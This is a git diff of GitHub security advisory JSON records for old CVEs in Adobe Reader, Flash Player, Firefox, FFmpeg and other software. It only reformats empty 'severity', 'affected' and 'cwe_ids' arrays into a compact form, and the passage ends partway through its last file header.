"ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7c5f-8pwv-5983/GHSA-7c5f-8pwv-5983.json b/advisories/unreviewed/2022/05/GHSA-7c5f-8pwv-5983/GHSA-7c5f-8pwv-5983.json index 76e82bb7b9a..80e9ecd6373 100644 --- a/advisories/unreviewed/2022/05/GHSA-7c5f-8pwv-5983/GHSA-7c5f-8pwv-5983.json +++ b/advisories/unreviewed/2022/05/GHSA-7c5f-8pwv-5983/GHSA-7c5f-8pwv-5983.json @@ -7,12 +7,8 @@ "CVE-2011-0606" ], "details": "Stack-based buffer overflow in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors related to a crafted length value, a different vulnerability than CVE-2011-0563 and CVE-2011-0589.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7cmx-3w9q-4v5g/GHSA-7cmx-3w9q-4v5g.json b/advisories/unreviewed/2022/05/GHSA-7cmx-3w9q-4v5g/GHSA-7cmx-3w9q-4v5g.json index 3713e6cf1a0..75e61394407 100644 --- a/advisories/unreviewed/2022/05/GHSA-7cmx-3w9q-4v5g/GHSA-7cmx-3w9q-4v5g.json +++ b/advisories/unreviewed/2022/05/GHSA-7cmx-3w9q-4v5g/GHSA-7cmx-3w9q-4v5g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7fvc-39jg-hx7f/GHSA-7fvc-39jg-hx7f.json b/advisories/unreviewed/2022/05/GHSA-7fvc-39jg-hx7f/GHSA-7fvc-39jg-hx7f.json index 1eed7887342..03d764cc100 100644 --- a/advisories/unreviewed/2022/05/GHSA-7fvc-39jg-hx7f/GHSA-7fvc-39jg-hx7f.json +++ b/advisories/unreviewed/2022/05/GHSA-7fvc-39jg-hx7f/GHSA-7fvc-39jg-hx7f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7fw9-7v97-fp5r/GHSA-7fw9-7v97-fp5r.json b/advisories/unreviewed/2022/05/GHSA-7fw9-7v97-fp5r/GHSA-7fw9-7v97-fp5r.json index 9d7cb9fa915..402362f990a 100644 --- a/advisories/unreviewed/2022/05/GHSA-7fw9-7v97-fp5r/GHSA-7fw9-7v97-fp5r.json +++ b/advisories/unreviewed/2022/05/GHSA-7fw9-7v97-fp5r/GHSA-7fw9-7v97-fp5r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7g64-64hc-38h5/GHSA-7g64-64hc-38h5.json b/advisories/unreviewed/2022/05/GHSA-7g64-64hc-38h5/GHSA-7g64-64hc-38h5.json index 5014ffc53ea..2309834ab6c 100644 --- a/advisories/unreviewed/2022/05/GHSA-7g64-64hc-38h5/GHSA-7g64-64hc-38h5.json +++ b/advisories/unreviewed/2022/05/GHSA-7g64-64hc-38h5/GHSA-7g64-64hc-38h5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7h55-3rvq-vwr9/GHSA-7h55-3rvq-vwr9.json b/advisories/unreviewed/2022/05/GHSA-7h55-3rvq-vwr9/GHSA-7h55-3rvq-vwr9.json index f037157609e..e25a758e5a0 100644 --- a/advisories/unreviewed/2022/05/GHSA-7h55-3rvq-vwr9/GHSA-7h55-3rvq-vwr9.json +++ b/advisories/unreviewed/2022/05/GHSA-7h55-3rvq-vwr9/GHSA-7h55-3rvq-vwr9.json @@ -7,12 +7,8 @@ "CVE-2011-2427" ], "details": "Stack-based buffer overflow in the ActionScript Virtual Machine (AVM) component in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to execute arbitrary code or cause a denial of service via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7jcw-f8cp-82p5/GHSA-7jcw-f8cp-82p5.json b/advisories/unreviewed/2022/05/GHSA-7jcw-f8cp-82p5/GHSA-7jcw-f8cp-82p5.json index 68e1c19ff83..edf12ef8a3b 100644 --- a/advisories/unreviewed/2022/05/GHSA-7jcw-f8cp-82p5/GHSA-7jcw-f8cp-82p5.json +++ b/advisories/unreviewed/2022/05/GHSA-7jcw-f8cp-82p5/GHSA-7jcw-f8cp-82p5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7m8h-jh7p-6pqw/GHSA-7m8h-jh7p-6pqw.json b/advisories/unreviewed/2022/05/GHSA-7m8h-jh7p-6pqw/GHSA-7m8h-jh7p-6pqw.json index 6cc073b76b2..2242e17d4c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-7m8h-jh7p-6pqw/GHSA-7m8h-jh7p-6pqw.json +++ b/advisories/unreviewed/2022/05/GHSA-7m8h-jh7p-6pqw/GHSA-7m8h-jh7p-6pqw.json @@ -7,12 +7,8 @@ "CVE-2008-5089" ], "details": "Multiple insecure method vulnerabilities in the DDActiveReportsViewer2.ARViewer2 ActiveX control (arview2.ocx) in Data Dynamics ActiveReports 2.5.0.1314 allow remote attackers to overwrite arbitrary files via a call to the (1) Pages.Save, (2) PrintReport, or (3) Canvas.Save method.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7pc8-c743-pmjf/GHSA-7pc8-c743-pmjf.json b/advisories/unreviewed/2022/05/GHSA-7pc8-c743-pmjf/GHSA-7pc8-c743-pmjf.json index e4c21bfbed6..51d9078c355 100644 --- a/advisories/unreviewed/2022/05/GHSA-7pc8-c743-pmjf/GHSA-7pc8-c743-pmjf.json +++ b/advisories/unreviewed/2022/05/GHSA-7pc8-c743-pmjf/GHSA-7pc8-c743-pmjf.json @@ -7,12 +7,8 @@ "CVE-2008-5013" ], "details": "Mozilla Firefox 2.x before 2.0.0.18 and SeaMonkey 1.x before 1.1.13 do not properly check when the Flash module has been dynamically unloaded properly, which allows remote attackers to execute arbitrary code via a crafted SWF file that \"dynamically unloads itself from an outside JavaScript function,\" which triggers an access of an expired memory address.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -124,9 +120,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7pfx-7xwq-x3pm/GHSA-7pfx-7xwq-x3pm.json b/advisories/unreviewed/2022/05/GHSA-7pfx-7xwq-x3pm/GHSA-7pfx-7xwq-x3pm.json index d893c9eabb1..3b6c9557871 100644 --- a/advisories/unreviewed/2022/05/GHSA-7pfx-7xwq-x3pm/GHSA-7pfx-7xwq-x3pm.json +++ b/advisories/unreviewed/2022/05/GHSA-7pfx-7xwq-x3pm/GHSA-7pfx-7xwq-x3pm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7pm6-cf6j-6prc/GHSA-7pm6-cf6j-6prc.json b/advisories/unreviewed/2022/05/GHSA-7pm6-cf6j-6prc/GHSA-7pm6-cf6j-6prc.json index b010ce1640a..3a057f4e7c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-7pm6-cf6j-6prc/GHSA-7pm6-cf6j-6prc.json +++ b/advisories/unreviewed/2022/05/GHSA-7pm6-cf6j-6prc/GHSA-7pm6-cf6j-6prc.json @@ -7,12 +7,8 @@ "CVE-2013-1192" ], "details": "The JAR files on Cisco Device Manager for Cisco MDS 9000 devices before 5.2.8, and Cisco Device Manager for Cisco Nexus 5000 devices, allow remote attackers to execute arbitrary commands on Windows client machines via a crafted element-manager.jnlp file, aka Bug IDs CSCty17417 and CSCty10802.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7r99-hmw7-fvpw/GHSA-7r99-hmw7-fvpw.json b/advisories/unreviewed/2022/05/GHSA-7r99-hmw7-fvpw/GHSA-7r99-hmw7-fvpw.json index 7ca54c05d27..bf114970148 100644 --- a/advisories/unreviewed/2022/05/GHSA-7r99-hmw7-fvpw/GHSA-7r99-hmw7-fvpw.json +++ b/advisories/unreviewed/2022/05/GHSA-7r99-hmw7-fvpw/GHSA-7r99-hmw7-fvpw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7rgc-wgxw-rjj6/GHSA-7rgc-wgxw-rjj6.json b/advisories/unreviewed/2022/05/GHSA-7rgc-wgxw-rjj6/GHSA-7rgc-wgxw-rjj6.json index 50187ea2d19..c510154cbce 100644 --- a/advisories/unreviewed/2022/05/GHSA-7rgc-wgxw-rjj6/GHSA-7rgc-wgxw-rjj6.json +++ b/advisories/unreviewed/2022/05/GHSA-7rgc-wgxw-rjj6/GHSA-7rgc-wgxw-rjj6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7v99-w6cg-vpcq/GHSA-7v99-w6cg-vpcq.json b/advisories/unreviewed/2022/05/GHSA-7v99-w6cg-vpcq/GHSA-7v99-w6cg-vpcq.json index fdeecfb2b1e..0489292dc84 100644 --- a/advisories/unreviewed/2022/05/GHSA-7v99-w6cg-vpcq/GHSA-7v99-w6cg-vpcq.json +++ b/advisories/unreviewed/2022/05/GHSA-7v99-w6cg-vpcq/GHSA-7v99-w6cg-vpcq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7vv4-9m79-rv2g/GHSA-7vv4-9m79-rv2g.json b/advisories/unreviewed/2022/05/GHSA-7vv4-9m79-rv2g/GHSA-7vv4-9m79-rv2g.json index 75dbdf49612..c4cbd4bd920 100644 --- a/advisories/unreviewed/2022/05/GHSA-7vv4-9m79-rv2g/GHSA-7vv4-9m79-rv2g.json +++ b/advisories/unreviewed/2022/05/GHSA-7vv4-9m79-rv2g/GHSA-7vv4-9m79-rv2g.json @@ -7,12 +7,8 @@ "CVE-2012-2782" ], "details": "Unspecified vulnerability in the decode_slice_header function in libavcodec/h264.c in FFmpeg before 0.11 has unknown impact and attack vectors, related to a \"rejected resolution change.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7w6j-444c-wpvq/GHSA-7w6j-444c-wpvq.json b/advisories/unreviewed/2022/05/GHSA-7w6j-444c-wpvq/GHSA-7w6j-444c-wpvq.json index 574e234e4d6..635aabffe8c 100644 --- a/advisories/unreviewed/2022/05/GHSA-7w6j-444c-wpvq/GHSA-7w6j-444c-wpvq.json +++ b/advisories/unreviewed/2022/05/GHSA-7w6j-444c-wpvq/GHSA-7w6j-444c-wpvq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7x96-q5x4-9p4w/GHSA-7x96-q5x4-9p4w.json b/advisories/unreviewed/2022/05/GHSA-7x96-q5x4-9p4w/GHSA-7x96-q5x4-9p4w.json index 0a6c3904251..aedf87f0463 100644 --- a/advisories/unreviewed/2022/05/GHSA-7x96-q5x4-9p4w/GHSA-7x96-q5x4-9p4w.json +++ b/advisories/unreviewed/2022/05/GHSA-7x96-q5x4-9p4w/GHSA-7x96-q5x4-9p4w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7xrx-h6m8-h59x/GHSA-7xrx-h6m8-h59x.json b/advisories/unreviewed/2022/05/GHSA-7xrx-h6m8-h59x/GHSA-7xrx-h6m8-h59x.json index 92bb21505f3..59aa3b83546 100644 --- a/advisories/unreviewed/2022/05/GHSA-7xrx-h6m8-h59x/GHSA-7xrx-h6m8-h59x.json +++ b/advisories/unreviewed/2022/05/GHSA-7xrx-h6m8-h59x/GHSA-7xrx-h6m8-h59x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-82rc-4rrx-5cj2/GHSA-82rc-4rrx-5cj2.json b/advisories/unreviewed/2022/05/GHSA-82rc-4rrx-5cj2/GHSA-82rc-4rrx-5cj2.json index 005958cc757..3889278a5bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-82rc-4rrx-5cj2/GHSA-82rc-4rrx-5cj2.json +++ b/advisories/unreviewed/2022/05/GHSA-82rc-4rrx-5cj2/GHSA-82rc-4rrx-5cj2.json @@ -7,12 +7,8 @@ "CVE-2013-5603" ], "details": "Use-after-free vulnerability in the nsContentUtils::ContentIsHostIncludingDescendantOf function in Mozilla Firefox before 25.0, Firefox ESR 24.x before 24.1, Thunderbird before 24.1, and SeaMonkey before 2.22 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via vectors involving HTML document templates.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8368-8fhr-8jhg/GHSA-8368-8fhr-8jhg.json b/advisories/unreviewed/2022/05/GHSA-8368-8fhr-8jhg/GHSA-8368-8fhr-8jhg.json index 56ddd5e2900..91f54073387 100644 --- a/advisories/unreviewed/2022/05/GHSA-8368-8fhr-8jhg/GHSA-8368-8fhr-8jhg.json +++ b/advisories/unreviewed/2022/05/GHSA-8368-8fhr-8jhg/GHSA-8368-8fhr-8jhg.json @@ -7,12 +7,8 @@ "CVE-2011-2428" ], "details": "Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to execute arbitrary code or cause a denial of service (browser crash) via unspecified vectors, related to a \"logic error issue.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8392-9r3r-6m6x/GHSA-8392-9r3r-6m6x.json b/advisories/unreviewed/2022/05/GHSA-8392-9r3r-6m6x/GHSA-8392-9r3r-6m6x.json index 79f2c2ac5ae..8ad59afada8 100644 --- a/advisories/unreviewed/2022/05/GHSA-8392-9r3r-6m6x/GHSA-8392-9r3r-6m6x.json +++ b/advisories/unreviewed/2022/05/GHSA-8392-9r3r-6m6x/GHSA-8392-9r3r-6m6x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-83p2-3vfv-j3jp/GHSA-83p2-3vfv-j3jp.json b/advisories/unreviewed/2022/05/GHSA-83p2-3vfv-j3jp/GHSA-83p2-3vfv-j3jp.json index 8d66f076759..323e3ca52c6 100644 --- a/advisories/unreviewed/2022/05/GHSA-83p2-3vfv-j3jp/GHSA-83p2-3vfv-j3jp.json +++ b/advisories/unreviewed/2022/05/GHSA-83p2-3vfv-j3jp/GHSA-83p2-3vfv-j3jp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-83w8-rxv4-7jg8/GHSA-83w8-rxv4-7jg8.json b/advisories/unreviewed/2022/05/GHSA-83w8-rxv4-7jg8/GHSA-83w8-rxv4-7jg8.json index 447b5ffd12e..9e4f862d781 100644 --- a/advisories/unreviewed/2022/05/GHSA-83w8-rxv4-7jg8/GHSA-83w8-rxv4-7jg8.json +++ b/advisories/unreviewed/2022/05/GHSA-83w8-rxv4-7jg8/GHSA-83w8-rxv4-7jg8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-844h-5pcp-3xmc/GHSA-844h-5pcp-3xmc.json b/advisories/unreviewed/2022/05/GHSA-844h-5pcp-3xmc/GHSA-844h-5pcp-3xmc.json index ff10fb677a5..497e499aeb4 100644 --- a/advisories/unreviewed/2022/05/GHSA-844h-5pcp-3xmc/GHSA-844h-5pcp-3xmc.json +++ b/advisories/unreviewed/2022/05/GHSA-844h-5pcp-3xmc/GHSA-844h-5pcp-3xmc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8495-qjxw-fcp2/GHSA-8495-qjxw-fcp2.json b/advisories/unreviewed/2022/05/GHSA-8495-qjxw-fcp2/GHSA-8495-qjxw-fcp2.json index 290ede56a4d..4f2d860b8c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-8495-qjxw-fcp2/GHSA-8495-qjxw-fcp2.json +++ b/advisories/unreviewed/2022/05/GHSA-8495-qjxw-fcp2/GHSA-8495-qjxw-fcp2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-85mc-3c4h-23p6/GHSA-85mc-3c4h-23p6.json b/advisories/unreviewed/2022/05/GHSA-85mc-3c4h-23p6/GHSA-85mc-3c4h-23p6.json index 191a750fca5..714947a6a64 100644 --- a/advisories/unreviewed/2022/05/GHSA-85mc-3c4h-23p6/GHSA-85mc-3c4h-23p6.json +++ b/advisories/unreviewed/2022/05/GHSA-85mc-3c4h-23p6/GHSA-85mc-3c4h-23p6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-862r-gj4m-5gp9/GHSA-862r-gj4m-5gp9.json b/advisories/unreviewed/2022/05/GHSA-862r-gj4m-5gp9/GHSA-862r-gj4m-5gp9.json index 7e438e5de9f..1fce3f2096c 100644 --- a/advisories/unreviewed/2022/05/GHSA-862r-gj4m-5gp9/GHSA-862r-gj4m-5gp9.json +++ b/advisories/unreviewed/2022/05/GHSA-862r-gj4m-5gp9/GHSA-862r-gj4m-5gp9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8663-4gw8-h5m6/GHSA-8663-4gw8-h5m6.json b/advisories/unreviewed/2022/05/GHSA-8663-4gw8-h5m6/GHSA-8663-4gw8-h5m6.json index 1430c4c8868..fe4285c7ddd 100644 --- a/advisories/unreviewed/2022/05/GHSA-8663-4gw8-h5m6/GHSA-8663-4gw8-h5m6.json +++ b/advisories/unreviewed/2022/05/GHSA-8663-4gw8-h5m6/GHSA-8663-4gw8-h5m6.json @@ -7,12 +7,8 @@ "CVE-2012-2804" ], "details": "Unspecified vulnerability in libavcodec/indeo3.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.5 has unknown impact and attack vectors, related to \"reallocation code\" and the luma height and width.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-86mg-57gh-5q24/GHSA-86mg-57gh-5q24.json b/advisories/unreviewed/2022/05/GHSA-86mg-57gh-5q24/GHSA-86mg-57gh-5q24.json index 064f133c004..aa6441d60fb 100644 --- a/advisories/unreviewed/2022/05/GHSA-86mg-57gh-5q24/GHSA-86mg-57gh-5q24.json +++ b/advisories/unreviewed/2022/05/GHSA-86mg-57gh-5q24/GHSA-86mg-57gh-5q24.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-86pg-q9vr-g8xh/GHSA-86pg-q9vr-g8xh.json b/advisories/unreviewed/2022/05/GHSA-86pg-q9vr-g8xh/GHSA-86pg-q9vr-g8xh.json index 743b23a18af..4f6539e74ad 100644 --- a/advisories/unreviewed/2022/05/GHSA-86pg-q9vr-g8xh/GHSA-86pg-q9vr-g8xh.json +++ b/advisories/unreviewed/2022/05/GHSA-86pg-q9vr-g8xh/GHSA-86pg-q9vr-g8xh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-87f2-g6cv-pjh2/GHSA-87f2-g6cv-pjh2.json b/advisories/unreviewed/2022/05/GHSA-87f2-g6cv-pjh2/GHSA-87f2-g6cv-pjh2.json index 12e91eca8a2..e24dc9504c6 100644 --- a/advisories/unreviewed/2022/05/GHSA-87f2-g6cv-pjh2/GHSA-87f2-g6cv-pjh2.json +++ b/advisories/unreviewed/2022/05/GHSA-87f2-g6cv-pjh2/GHSA-87f2-g6cv-pjh2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-87pf-j2gx-jjvx/GHSA-87pf-j2gx-jjvx.json b/advisories/unreviewed/2022/05/GHSA-87pf-j2gx-jjvx/GHSA-87pf-j2gx-jjvx.json index a46ac783cd8..d28ce3404dd 100644 --- a/advisories/unreviewed/2022/05/GHSA-87pf-j2gx-jjvx/GHSA-87pf-j2gx-jjvx.json +++ b/advisories/unreviewed/2022/05/GHSA-87pf-j2gx-jjvx/GHSA-87pf-j2gx-jjvx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-87xc-6jc8-x7r3/GHSA-87xc-6jc8-x7r3.json b/advisories/unreviewed/2022/05/GHSA-87xc-6jc8-x7r3/GHSA-87xc-6jc8-x7r3.json index 06c0d27a266..54d483568ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-87xc-6jc8-x7r3/GHSA-87xc-6jc8-x7r3.json +++ b/advisories/unreviewed/2022/05/GHSA-87xc-6jc8-x7r3/GHSA-87xc-6jc8-x7r3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-89fx-4q7j-4cp4/GHSA-89fx-4q7j-4cp4.json b/advisories/unreviewed/2022/05/GHSA-89fx-4q7j-4cp4/GHSA-89fx-4q7j-4cp4.json index a1a81da5d8d..3e9598c5cd6 100644 --- a/advisories/unreviewed/2022/05/GHSA-89fx-4q7j-4cp4/GHSA-89fx-4q7j-4cp4.json +++ b/advisories/unreviewed/2022/05/GHSA-89fx-4q7j-4cp4/GHSA-89fx-4q7j-4cp4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-89gf-qwvc-7g2j/GHSA-89gf-qwvc-7g2j.json b/advisories/unreviewed/2022/05/GHSA-89gf-qwvc-7g2j/GHSA-89gf-qwvc-7g2j.json index 585445e4e63..b73407c637f 100644 --- a/advisories/unreviewed/2022/05/GHSA-89gf-qwvc-7g2j/GHSA-89gf-qwvc-7g2j.json +++ b/advisories/unreviewed/2022/05/GHSA-89gf-qwvc-7g2j/GHSA-89gf-qwvc-7g2j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-89mr-5p7g-mp6c/GHSA-89mr-5p7g-mp6c.json b/advisories/unreviewed/2022/05/GHSA-89mr-5p7g-mp6c/GHSA-89mr-5p7g-mp6c.json index e1b3ab7d61c..88071dec8a0 100644 --- a/advisories/unreviewed/2022/05/GHSA-89mr-5p7g-mp6c/GHSA-89mr-5p7g-mp6c.json +++ b/advisories/unreviewed/2022/05/GHSA-89mr-5p7g-mp6c/GHSA-89mr-5p7g-mp6c.json @@ -7,12 +7,8 @@ "CVE-2010-2213" ], "details": "Adobe Flash Player before 9.0.280 and 10.x before 10.1.82.76, and Adobe AIR before 2.0.3, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-0209, CVE-2010-2214, and CVE-2010-2216.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-89vw-2rh5-mcq6/GHSA-89vw-2rh5-mcq6.json b/advisories/unreviewed/2022/05/GHSA-89vw-2rh5-mcq6/GHSA-89vw-2rh5-mcq6.json index 058d2bdc686..cd21a9033eb 100644 --- a/advisories/unreviewed/2022/05/GHSA-89vw-2rh5-mcq6/GHSA-89vw-2rh5-mcq6.json +++ b/advisories/unreviewed/2022/05/GHSA-89vw-2rh5-mcq6/GHSA-89vw-2rh5-mcq6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8c3v-xj7m-q437/GHSA-8c3v-xj7m-q437.json b/advisories/unreviewed/2022/05/GHSA-8c3v-xj7m-q437/GHSA-8c3v-xj7m-q437.json index 97d8f9dde03..5da5f59d8e8 